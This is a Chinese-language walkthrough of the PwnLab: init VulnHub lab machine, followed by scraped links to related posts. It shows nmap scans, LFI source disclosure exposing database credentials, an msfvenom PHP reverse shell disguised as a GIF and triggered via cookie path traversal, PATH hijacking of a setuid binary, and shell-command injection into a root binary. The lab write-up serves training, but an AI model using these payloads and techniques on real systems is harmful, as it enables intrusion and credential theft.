关于

  • 下载地址点我
  • Flag: /root/flag.txt
  • 放假的第一天
  • 哔哩哔哩视频

信息收集

nmap -sn 192.168.7.1/24

Starting Nmap 7.01 ( https://nmap.org ) at 2018-07-10 12:55 CST

Nmap scan report for 192.168.7.1

Host is up (0.00071s latency).

Nmap scan report for 192.168.7.130

Host is up (0.00060s latency).

Nmap done: 256 IP addresses (2 hosts up) scanned in 2.39 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2018-07-10 12:55 CST

Nmap scan report for 192.168.7.130

Host is up (0.00098s latency).

Not shown: 997 closed ports

PORT     STATE SERVICE VERSION

80/tcp   open  http    Apache httpd 2.4.10 ((Debian))

|_http-server-header: Apache/2.4.10 (Debian)

|_http-title: PwnLab Intranet Image Hosting

111/tcp  open  rpcbind 2-4 (RPC #100000)

| rpcinfo:

|   program version   port/proto  service

|   100000  2,3,4        111/tcp  rpcbind

|   100000  2,3,4        111/udp  rpcbind

|   100024  1          44040/tcp  status

|_  100024  1          51756/udp  status

3306/tcp open  mysql   MySQL 5.5.47-0+deb8u1

| mysql-info:

|   Protocol: 53

|   Version: .5.47-0+deb8u1

|   Thread ID: 84

|   Capabilities flags: 63487

|   Some Capabilities: SupportsTransactions, Support41Auth, DontAllowDatabaseTableColumn, ConnectWithDatabase, Speaks41ProtocolOld, SupportsLoadDataLocal, FoundRows, SupportsCompression, LongColumnFlag, Speaks41ProtocolNew, InteractiveClient, IgnoreSpaceBeforeParenthesis, LongPassword, IgnoreSigpipes, ODBCClient

|   Status: Autocommit

|_  Salt: "]0w'Xi((0XLS:j'"r<q

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 7.04 seconds

  1. 开了80和3306端口,系统Debian,打开Web看看
  2. 发现URL有一个规律,可能page后面跟着是一个文件名,但是没有后缀名
<?php if(isset($_GET['page'])){

include($_GET['page'].".php")

?>

我们猜测index的代码像上面的功能一样。

http://192.168.7.130/?page=login

http://192.168.7.130/?page=upload
  1. 可能存在LFI(local file inclusion)漏洞
  2. 构造URLhttp://192.168.7.130/?page=php://filter/convert.base64-encode/resource=login
  3. 发现可以包含读到文件,然后base64解密
---login.php---

<?php

session_start();

require("config.php");

$mysqli = new mysqli($server, $username, $password, $database);

if (isset($_POST['user']) and isset($_POST['pass']))

{

	$luser = $_POST['user'];

	$lpass = base64_encode($_POST['pass']);

	$stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?");

	$stmt->bind_param('ss', $luser, $lpass);

	$stmt->execute();

	$stmt->store_Result();

	if ($stmt->num_rows == 1)

	{

		$_SESSION['user'] = $luser;

		header('Location: ?page=upload');

	}

	else

	{

		echo "Login failed.";

	}

}

else

{

	?>

	<form action="" method="POST">

	<label>Username: </label><input id="user" type="test" name="user"><br />

	<label>Password: </label><input id="pass" type="password" name="pass"><br />

	<input type="submit" name="submit" value="Login">

	</form>

	<?php

}
  1. 跟着再把require中的config读出来
<?php

$server	  = "localhost";

$username = "root";

$password = "H4u%QJ_H99";

$database = "Users";

?>%
  1. 顺便也把index和upload的也读了
---index---

<?php

//Multilingual. Not implemented yet.

//setcookie("lang","en.lang.php");

if (isset($_COOKIE['lang']))

{

	include("lang/".$_COOKIE['lang']);

}

// Not implemented yet.

?>

<html>

<head>

<title>PwnLab Intranet Image Hosting</title>

</head>

<body>

<center>

<img src="images/pwnlab.png"><br />

[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]

<hr/><br/>

<?php

	if (isset($_GET['page']))

	{

		include($_GET['page'].".php");

	}

	else

	{

		echo "Use this server to upload and share image files inside the intranet";

	}

?>

</center>

</body>

</html>% 

---upload---

<?php

session_start();

if (!isset($_SESSION['user'])) { die('You must be log in.'); }

?>

<html>

	<body>

		<form action='' method='post' enctype='multipart/form-data'>

			<input type='file' name='file' id='file' />

			<input type='submit' name='submit' value='Upload'/>

		</form>

	</body>

</html>

<?php

if(isset($_POST['submit'])) {

	if ($_FILES['file']['error'] <= 0) {

		$filename  = $_FILES['file']['name'];

		$filetype  = $_FILES['file']['type'];

		$uploaddir = 'upload/';

		$file_ext  = strrchr($filename, '.');

		$imageinfo = getimagesize($_FILES['file']['tmp_name']);

		$whitelist = array(".jpg",".jpeg",".gif",".png"); 

		if (!(in_array($file_ext, $whitelist))) {

			die('Not allowed extension, please upload images only.');

		}

		if(strpos($filetype,'image') === false) {

			die('Error 001');

		}

		if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png') {

			die('Error 002');

		}

		if(substr_count($filetype, '/')>1){

			die('Error 003');

		}

		$uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;

		if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {

			echo "<img src=\"".$uploadfile."\"><br />";

		} else {

			die('Error 4');

		}

	}

}

?>%
  1. 在上面已经拿到了MySQL的账号密码了,而且在用nmap扫的时候已经发现3306端口是开放的。
  2. mysql -h 192.168.7.130 -u root -D Users -p密码是config文件的那个,自行解密。
mysql> show tables;

+-----------------+

| Tables_in_Users |

+-----------------+

| users           |

+-----------------+

1 row in set (0.00 sec)

mysql> select * from users;

+------+------------------+

| user | pass             |

+------+------------------+

| kent | Sld6WHVCSkpOeQ== |---JWzXuBJJNy

| mike | U0lmZHNURW42SQ== |---SIfdsTEn6I

| kane | aVN2NVltMkdSbw== |---iSv5Ym2GRo

+------+------------------+

3 rows in set (0.01 sec)
  1. 登录上传文件试试,上面的源码已经知道只能上传图片后缀的文件,而且还判了文件类型和mime

绕过上传

  • 方法1:在木马上加图片标志绕过
  1. echo GIF89a > kali.gif
  2. msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.7.1 LPORT=7788 R >>kali.gif
  • 方法2:上BurpSuite,你们比我熟练。
  1. 上传之后会返回一个相对路径就是文件的md5upload/51c65dd716e81189745d6eb1c9f1bb6b.gif
  2. 直接打开是不会解析的,但是index文件那还有一个文件包含,文件路径可以通过cookie传进去
  3. curl --cookie "lang=../../../../../../etc/passwd" "http://192.168.7.130"
root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/usr/sbin/nologin

man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin

irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false

systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false

systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false

systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false

Debian-exim:x:104:109::/var/spool/exim4:/bin/false

messagebus:x:105:110::/var/run/dbus:/bin/false

statd:x:106:65534::/var/lib/nfs:/bin/false

john:x:1000:1000:,,,:/home/john:/bin/bash

kent:x:1001:1001:,,,:/home/kent:/bin/bash

mike:x:1002:1002:,,,:/home/mike:/bin/bash

kane:x:1003:1003:,,,:/home/kane:/bin/bash

mysql:x:107:113:MySQL Server,,,:/nonexistent:/bin/false

<html>

<head>

<title>PwnLab Intranet Image Hosting</title>

</head>

<body>

<center>

<img src="images/pwnlab.png"><br />

[ <a href="/">Home</a> ] [ <a href="?page=login">Login</a> ] [ <a href="?page=upload">Upload</a> ]

<hr/><br/>

Use this server to upload and share image files inside the intranet</center>

</body>

</html>%
  1. 发现可以,把../../../../etc/passwd换刚刚上传的木马路径
  2. curl --cookie "lang=../upload/51c65dd716e81189745d6eb1c9f1bb6b.gif" "http://192.168.7.130"
  3. 发现meterpreter那边已经获取到回话了。
[*] Started reverse TCP handler on 192.168.7.1:7788

[*] Meterpreter session 1 opened (192.168.7.1:7788 -> 192.168.7.130:55888) at 2018-07-10 14:19:16 +0800

meterpreter >

提权

  1. 还是以前的套路python -c 'import pty;pty.spawn("/bin/bash")'拿数据库的密码去登录各个用户
  2. 发现kane的密码可以登录,在他的home目录找到了一个属于mike用户的ELF可执行文件
kane@pwnlab:~$ file msgmike

file msgmike

msgmike: setuid, setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=d7e0b21f33b2134bd17467c3bb9be37deb88b365, not stripped

kane@pwnlab:~$ ./msgmike

./msgmike

cat: /home/mike/msg.txt: No such file or directory
  1. 执行报没有mike用户目录下的文件,把他下载回来,先用Python中的python -m SimpleHTTPServer搭建一个简单的http服务。浏览器打开192.168.7.130:8000
python -m SimpleHTTPServer

Serving HTTP on 0.0.0.0 port 8000 ...

192.168.7.1 - - [10/Jul/2018 02:39:26] "GET / HTTP/1.1" 200 -

192.168.7.1 - - [10/Jul/2018 02:39:26] code 404, message File not found

192.168.7.1 - - [10/Jul/2018 02:39:26] "GET /favicon.ico HTTP/1.1" 404 -

192.168.7.1 - - [10/Jul/2018 02:39:28] "GET /msgmike HTTP/1.1" 200 -

  1. 简单拖进IDA看看cat /home/mike/msg.txt它使用了带参数的系统函数,我们把环境变量改为当前目录。

  2. 可以修改PATH变量,从而将这个“cat”转换为shell:

kane@pwnlab:~$ ./msgmike

./msgmike

cat: /home/mike/msg.txt: No such file or directory

kane@pwnlab:~$ echo "/bin/bash" > cat

echo "/bin/bash" > cat

kane@pwnlab:~$ ls

ls

cat  msgmike

kane@pwnlab:~$ chmod 777 cat

chmod 777 cat

kane@pwnlab:~$ export PATH=/home/kane

export PATH=/home/kane

kane@pwnlab:~$ ./msgmike

./msgmike

bash: dircolors: command not found

bash: ls: command not found

mike@pwnlab:~$
  1. 现在用户变成Mike了,再把PATH改回来export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin就可以了。现在到Mike的home目录发现有一个文件msg2root继续拖进IDA发现"/bin/echo %s >> /root/messages.txt"
  2. 这是把用户传进的字符串打印出来,但如果字符串里有分隔符的话就可能跟着执行了下一个命令。而且是root权限。
mike@pwnlab:/home/mike$ ./msg2root

./msg2root

Message for root: id ; whoami

id ; whoami

id

root

mike@pwnlab:/home/mike$ 

mike@pwnlab:/home/mike$ ./msg2root

./msg2root

Message for root: asdasdasdas;/bin/sh

asdasdasdas;/bin/sh

asdasdasdas

id

uid=1002(mike) gid=1002(mike) euid=0(root) egid=0(root) groups=0(root),1003(kane)

cd /root

ls

flag.txt  messages.txt

cat flag.txt


.-=~=-.                                                                 .-=~=-.

(__  _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__  _)

(_ ___)  _____                             _                            (_ ___)

(__  _) /  __ \                           | |                           (__  _)

( _ __) | /  \/ ___  _ __   __ _ _ __ __ _| |_ ___                      ( _ __)

(__  _) | |    / _ \| '_ \ / _` | '__/ _` | __/ __|                     (__  _)

(_ ___) | \__/\ (_) | | | | (_| | | | (_| | |_\__ \                     (_ ___)

(__  _)  \____/\___/|_| |_|\__, |_|  \__,_|\__|___/                     (__  _)

( _ __)                     __/ |                                       ( _ __)

(__  _)                    |___/                                        (__  _)

(__  _)                                                                 (__  _)

(_ ___) If  you are  reading this,  means  that you have  break 'init'  (_ ___)

( _ __) Pwnlab.  I hope  you enjoyed  and thanks  for  your time doing  ( _ __)

(__  _) this challenge.                                                 (__  _)

(_ ___)                                                                 (_ ___)

( _ __) Please send me  your  feedback or your  writeup,  I will  love  ( _ __)

(__  _) reading it                                                      (__  _)

(__  _)                                                                 (__  _)

(__  _)                                             For sniferl4bs.com  (__  _)

( _ __)                                claor@PwnLab.net - @Chronicoder  ( _ __)

(__  _)                                                                 (__  _)

(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___)

`-._.-'                                                                 `-._.-'

#

[Write-up]-pwnlab_init的更多相关文章

  1. Vulnhub 靶机 pwnlab_init 渗透——详细教程

    1. 下载 pwnlab_ini 靶机的 .ova 文件并导入 VMware: pwnlab下载地址:PwnLab: init ~ VulnHub 导入VMware时遇到VMware上虚机太多,无法确 ...

  2. Write-Up-wakanda-1

    关于 下载地址:点我 哔哩哔哩:哔哩哔哩 祖传开头 信息收集 这里用vm虚拟机可能有一点问题,因为官方的是用vbox虚拟机导出的镜像文件.所以这次使用vbox虚拟机. ➜ ~ ip a show de ...

随机推荐

  1. anacondaPython3.7退回到Python3.6

    https://blog.csdn.net/Fhujinwu/article/details/85851587

  2. 2、基本方法(Basic Recipes)

    学习目录:树莓派学习之路-GPIO Zero 官网地址:http://gpiozero.readthedocs.io/en/stable/recipes.html 环境:UbuntuMeta-16.0 ...

  3. 看 C++ Primer 的58页, 讲拷贝时不能忽略 底层const这里的说的原因有点牵强, 这里给出自己的理解

    extern const  int ci =42; const int * p2  = &ci; extern const  int *const p3= p2; int *p= p3;   ...

  4. Java面向对象编程 -4.3

    static应用实例 编写一个程序类,这个类可以实现实例化对象个数的统计,每次创建的实例化对象都可以实现一个统计操作. 此时可以单独创建一个static属性,因为所有对象都共享同一个static属性, ...

  5. 实验四《Android程序设计》

    实验四<Android程序设计> 一.实验内容 1.Android Stuidio的安装测试 2.Activity测试 3.UI测试 4.布局测试 5.事件处理测试 二.实验步骤 第一部分 ...

  6. ASP.NET Core搭建多层网站架构【11-WebApi统一处理返回值、异常】

    2020/02/01, ASP.NET Core 3.1, VS2019 摘要:基于ASP.NET Core 3.1 WebApi搭建后端多层网站架构[11-WebApi统一处理返回值.异常] 使用I ...

  7. 「WC2013」糖果公园

    「WC2013」糖果公园 传送门 树上带修莫队板子题. 看懂题意后就是板子题了. 参考代码: #include <algorithm> #include <cstdio> #i ...

  8. TCP网络调试助手上提示错误:“1035 未知错误”的有效解决方法,本人实测确实可行

    转:https://blog.csdn.net/jacket_/article/details/97415651 图片转载:https://blog.csdn.net/Alice_YCR/articl ...

  9. leetcode 0211

    目录 ✅ 1217. 玩筹码 描述 解答 c java py ✅ 206. 反转链表 描述 解答 c java py ✅ 922. 按奇偶排序数组 II 描述 解答 c 双指针soldier tddo ...

  10. 线上学习-语言模型 language model

    chain rule markov assumption 评估语言模型 平滑方法